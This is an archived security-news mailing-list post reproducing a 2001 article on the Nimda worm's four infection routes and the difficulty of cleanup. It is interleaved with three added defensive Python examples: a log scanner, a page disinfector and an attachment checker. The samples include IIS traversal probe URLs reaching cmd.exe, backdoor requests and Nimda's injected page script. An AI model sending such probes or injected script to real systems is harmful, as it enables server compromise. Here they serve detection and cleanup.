Information Security News mailing list archives

New studies reveal Nimda's tenacity


From: InfoSec News <isn () c4i org>
Date: Sun, 23 Sep 2001 05:00:31 -0500 (CDT)

http://news.cnet.com/news/0-1003-200-7250546.html

By Robert Lemos
Special to CNET News.com 
September 21, 2001, 1:20 p.m. PT 

Nimda's number may not be up.

Security consultants stressed Friday that while the spread of the
disruptive Nimda worm has slowed, many companies are having
difficulties rousting the malicious program from their networks.

"It's an awfully insidious little bastard," said Mike Scher, senior
research consultant with network-protection company Neohapsis. "You
clean it off of one segment of the network and have to make sure it
doesn't come back. It's almost like fighting a fire."

After successfully preventing Nimda from entering its network, Scher's
client--a Fortune 500 company--picked up the worm from an employee
working from home. After that, the program spread quickly throughout
the corporation's worldwide offices.

"This is a huge organization, so there are lots of infections," said
Scher, who had been working 48 hours to clean the digital infestation
from the network. "It's a terrible pain to get off."

The tenacious worm also caused several Internet service providers to
take drastic steps to block customers from spreading the worm and
overloading their networks with traffic.

XO Communications acknowledged on Friday that the company severed
almost a quarter of its customers' Web servers from the Internet in an
attempt to halt the deluge of data produced by the worm.

"Many of our customers are small businesses," XO spokeswoman Jenna Dee
said. "They bring in an IT person to set up their network and don't
have a full-time technical employee. Those types of businesses are the
most susceptible to these attacks."

Another Internet service provider, DSL.net, completely cut off
hundreds of its customers after it became apparent that their
computers had been infected by the worm, according to customers'
reports. DSL.net did not immediately respond to requests for comment.

The Nimda worm hit so quickly--peaking within 6 hours--and caused so
much havoc that accurate analysis of the worm has been delayed.

For example, earlier this week, antivirus software company Symantec
originally classified removal of the Nimda worm as "easy," but 24
hours later it changed that evaluation.

The latest information shows that the Nimda worm's extensive
replacement of key files and programs on infected PCs and its use of
Windows file sharing to spread across local area networks have made it
difficult to clean out.

Nimda--which is "admin," the shortened form of "system administrator,"
spelled backwards--started spreading early Tuesday morning and quickly
infected PCs and servers across the Internet. Also known as
"readme.exe" and "W32.Nimda," the worm is the first to use four
different methods to infect not only PCs running Windows 95, 98, Me
and 2000, but also servers running Windows 2000 and Windows NT.

The worm spreads by four different routes. Microsoft has posted an
extensive list of patches and advisories to combat the worm.

The worm originally spread quickly by broadly scanning local networks
and the Internet for Web servers running Microsoft's Internet
Information Server software that were vulnerable to one of two
well-known flaws.

First, if the server had already been compromised by the Code Red II
worm, then Nimda used that backdoor to copy itself to the server as a
file named "admin.dll." For all other IIS servers, the program
attempted to use the "Web server folder traversal" vulnerability
discovered in October 2000 to copy the file "admin.dll" to the server.
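Both server-side entry points above leave a distinctive trail in IIS logs. As an added example, not code from the article or from any vendor, the Python below decodes request paths the way the unpatched IIS decoder did and flags both the root.exe backdoor requests and the traversal-to-cmd.exe probes. The log lines are constructed, modeled on the probe URLs CERT listed in CA-2001-26, and the field layout assumes the W3C extended log format.

```python
"""Flag IIS log lines carrying the probes the article describes: a request for
the root.exe backdoor that Code Red II leaves behind, or a path that escapes
the web root to reach cmd.exe after URL decoding, including the overlong
UTF-8 ("%c1%1c") and double-encoded ("%255c") spellings that unpatched IIS
accepted.  Added example, not code from the article or from any vendor."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Constructed sample log (W3C extended format: date time c-ip method uri-stem
# uri-query status), modeled on the probe URLs listed in CERT CA-2001-26.
# Not real traffic.
SAMPLE_LOG = """\
2001-09-18 13:02:11 10.0.0.7 GET /scripts/root.exe /c+dir 404
2001-09-18 13:02:12 10.0.0.7 GET /MSADC/root.exe /c+dir 404
2001-09-18 13:02:13 10.0.0.7 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:02:14 10.0.0.7 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:02:15 10.0.0.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:02:16 10.0.0.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:02:17 10.0.0.7 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:05:40 10.0.0.9 GET /index.htm - 200
2001-09-18 13:05:41 10.0.0.9 GET /images/logo.gif - 200
"""

_TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def decode_iis_path(uri_stem: str, rounds: int = 2) -> str:
    """Decode a request path the way the vulnerable IIS decoder did.

    Percent-decoding is applied up to `rounds` times so that "%255c" becomes
    "%5c" and then "\\" (the double-decode bug, MS01-026).  Afterwards the
    two-byte overlong UTF-8 forms are folded to ASCII without checking that
    the second byte is a continuation byte, which is what turned "%c0%af"
    into "/" and "%c1%1c" / "%c1%9c" into "\\" (MS00-078).  Backslashes are
    normalised to "/" so a single regex can look for ".." segments.
    """
    raw = uri_stem.encode("latin-1")
    for _ in range(rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out).replace("\\", "/")


def classify_request(uri_stem: str) -> Optional[str]:
    """Label a probe, or return None for a request that looks benign."""
    path = decode_iis_path(uri_stem).lower()
    if path.endswith("/root.exe"):
        return "code-red-ii-backdoor"      # cmd.exe copy left by Code Red II
    if path.endswith("/cmd.exe"):
        if _TRAVERSAL.search(path):
            return "traversal-to-cmd"      # escaped the web root to reach cmd.exe
        return "direct-cmd"                # cmd.exe reachable without traversal,
                                           # e.g. via a /c or /d virtual root
    return None


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, uri_stem, label) for every flagged line."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[3] != "GET":
            continue
        label = classify_request(fields[4])
        if label:
            hits.append((fields[2], fields[4], label))
    return hits


if __name__ == "__main__":
    for ip, uri, label in scan_log(SAMPLE_LOG):
        print(f"{ip}  {label:22s} {uri}")
```

Matching on the decoded path rather than on literal strings such as "%c1%1c" is the point: one check catches the %5c, overlong UTF-8 and double-encoded spellings alike, and a 200 status on any of the traversal lines is the signal that the server actually executed the request rather than rejecting it.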

Once the file is copied to the computer, the worm executes it and
infects the new victim. On such servers, the worm enables the built-in
Guest account and adds it to the Administrators group, copies itself to
any network drives, shares the C: drive over the network, and appends
a script to HTM, HTML and ASP files.

Those files then try to push a copy of the worm onto the computer of
anyone who views a Web page hosted by the infected server with a
browser that has JavaScript enabled. The worm also deletes the
registry keys that hold the security settings for the computer's file
shares and arranges for itself to be run at start-up.

The ability to infect others through viewing a Web page is the Nimda
worm's second path of infection.

The snippet of JavaScript added to each Web file on an infected server
makes the visitor's browser fetch a copy of the worm, renamed
"readme.eml," from the server. On PCs running Internet Explorer 5.5
SP1 or earlier without the relevant patch, the worm then runs with no
user action. On any other browser with JavaScript enabled, the script
still makes the browser try to fetch the file, but the browser asks
the user's permission before opening it.
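One cleanup step for this second path is finding which served pages carry the appended script. As an added example, not code from the article, the Python below locates that block in HTML and ASP content and strips it. The sample pages are constructed; the snippet itself is reproduced as CERT CA-2001-26 records it; and the pattern also accepts the .nws extension the worm used for other copies of itself, which the article does not mention.

```python
"""Find and strip the script block Nimda appended to served web pages.
Added example, not code from the article; the sample documents are
constructed, with the appended snippet as CERT CA-2001-26 records it."""
import re
from typing import Dict, List

NIMDA_SNIPPET = ('<html><script language="JavaScript">'
                 'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")'
                 '</script></html>')

# Constructed sample site: two infected pages, one clean page, and a clean page
# whose own window.open() call must not be mistaken for the injection.
SAMPLE_SITE: Dict[str, str] = {
    "index.htm": "<html><body><h1>Welcome</h1></body></html>\n" + NIMDA_SNIPPET,
    "about.html": "<html><body><p>About us</p></body></html>\n",
    "order.asp": "<%@ Language=VBScript %>\n<html><body>Order form</body></html>\n" + NIMDA_SNIPPET,
    "popup.html": '<html><script>window.open("help.html", "help")</script></html>\n',
}

# The injection is a complete second <html> document tacked onto the end of the
# file whose only content is a window.open() of a .eml or .nws copy of the worm.
_INJECTED = re.compile(
    r'<html>\s*<script[^>]*>\s*window\.open\(\s*"([^"]+\.(?:eml|nws))"[^<]*</script>\s*</html>',
    re.IGNORECASE)


def find_injected(content: str) -> List[str]:
    """Return the .eml/.nws file names the page tries to pop open (empty if clean)."""
    return _INJECTED.findall(content)


def disinfect(content: str) -> str:
    """Remove the appended block and leave the page's own markup untouched."""
    return _INJECTED.sub("", content).rstrip("\n") + "\n"


def scan_site(pages: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each infected page name to the worm copies it references."""
    report = {}
    for name, body in pages.items():
        hits = find_injected(body)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, copies in scan_site(SAMPLE_SITE).items():
        print(f"{name}: references {', '.join(copies)}")
```

The pattern keys on the shape of the injection (a trailing, self-contained document whose only content is the pop-up) rather than on the string "readme.eml" alone, so a page's legitimate window.open() calls are left alone and a renamed copy would still be caught; pages found this way still need the referenced .eml/.nws files removed from the same directories.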

PCs can also be infected through the worm's third mode of
transmission: e-mail.

On infected computers, the Nimda worm runs its own mail service and
sends e-mail to addresses in Windows address book as well as to those
culled from the machine's browser cache, which stores elements of
recently viewed Web pages.

The e-mail appears to carry an attached WAV file, but in reality it
exploits a MIME (multipurpose Internet mail extensions) handling flaw
in Internet Explorer's rendering engine, patched in March 2001
(MS01-020), to run the worm as soon as the message is displayed in the
mail client's preview pane.

Even on computers that are not vulnerable to the security flaw, the
attachment causes the Outlook and Outlook Express e-mail programs to
open a dialog box asking the user for permission to open the file.
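The MIME trick above is a mismatch between what the headers declare and what the attachment actually is. As an added example, not code from the article, the Python below runs a gateway-style check over a constructed message: a part declared audio/x-wav whose name ends in .exe and whose bytes begin with a Windows executable header is flagged, while a genuine WAV part is not. The executable payload is a harmless stub, and the rule set is this example's own, not any vendor's.

```python
"""Gateway-side check for the trick the article describes: an attachment whose
declared MIME type (audio/x-wav) says "sound clip" while the file name and the
bytes say "Windows executable".  Added example, not from the article; the
message below is constructed and the executable is a harmless stub."""
import base64
from email import message_from_string
from typing import List, Tuple

EXEC_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".vbs", ".dll")

# Harmless stand-ins: a DOS/PE header fragment and a RIFF/WAVE header fragment.
_FAKE_EXE = base64.b64encode(b"MZ" + b"\x90" * 62 + b"PE\x00\x00stub").decode()
_REAL_WAV = base64.b64encode(b"RIFF\x24\x00\x00\x00WAVEfmt ").decode()

SAMPLE_MAIL = f"""\
From: someone@example.com
To: victim@example.com
Subject: readme
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUND"

--BOUND
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

<html><body></body></html>
--BOUND
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64

{_FAKE_EXE}
--BOUND
Content-Type: audio/x-wav; name="clip.wav"
Content-Transfer-Encoding: base64

{_REAL_WAV}
--BOUND--
"""


def suspicious_parts(raw: str) -> List[Tuple[str, str, List[str]]]:
    """Return (content_type, file_name, reasons) for each part that looks like
    an executable hiding behind a harmless MIME type."""
    findings = []
    for part in message_from_string(raw).walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()   # Content-Disposition or Content-Type name=
        payload = part.get_payload(decode=True) or b""
        reasons = []
        # Rule 1: the declared type does not admit an executable file name.
        if name.endswith(EXEC_EXT) and not ctype.startswith("application/"):
            reasons.append(f"{ctype} declared for executable name {name!r}")
        # Rule 2: the bytes carry a DOS/PE header, whatever the headers claim.
        if payload[:2] == b"MZ":
            reasons.append("payload starts with MZ (Windows executable)")
        if reasons:
            findings.append((ctype, name, reasons))
    return findings


if __name__ == "__main__":
    for ctype, name, reasons in suspicious_parts(SAMPLE_MAIL):
        print(f"{name} ({ctype}): " + "; ".join(reasons))
```

Rule 2 is the one that matters for a client that trusts Content-Type when deciding whether to open an attachment unprompted: the declared type and file name are attacker-controlled, the leading bytes of the decoded payload are not. Blocking executables declared honestly as application/octet-stream is a separate policy decision this check leaves alone.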

If the worm infects a PC through either the Web browser or e-mail,
Nimda acts much like it does on servers. In addition, the worm adds a
"load.exe" file to the Windows System directory, appends itself to
many .exe, .eml and Word document files, and replaces common
applications such as WordPad, WinZip32 and HyperTerminal with a copy
that executes the worm.

In addition, the worm places copies of itself named "Riched20.dll"--the
rich-text editing library that Word, WordPad and other editing programs
load--in multiple places on every accessible hard drive. Because
Windows searched the current directory (the folder of the document just
opened) before the system directory, a program that uses Riched20.dll
loads the planted copy instead of the real one, and that also executes
the worm.

This ability to spread copies of itself throughout corporate networks
by using shared drives is the fourth way the worm infects.

Using the network-sharing mechanism, the Nimda worm spreads fast and
makes extermination very difficult, said Vincent Gullotto, director of
security software maker Network Associates' antivirus emergency
response team.

"While you are cleaning one area of the network, it is coming back
behind you and reinfecting the computers," he said.

Network Associates, Symantec and other security companies have tools
to help system administrators clean their systems.

Yet even if companies do completely eradicate the worm from their
networks, Nimda will be out there for a long time, said Jensenne
Roculan, incident analyst for SecurityFocus.com's ARIS Incident
Analysis Team. Roculan pointed out that Code Red and its variant still
account for some 30,000 infections worldwide.

"Code Red is still going strong because of the number of unpatched
systems on the Web," she said. "If that is any indication, Nimda
should be around for a while."

Analyses of the Nimda worm can be found at CERT, SecurityFocus.com,
Neohapsis and most antivirus companies' Web sites.



-
ISN is currently hosted by Attrition.org

To unsubscribe email majordomo () attrition org with 'unsubscribe isn' in the BODY
of the mail.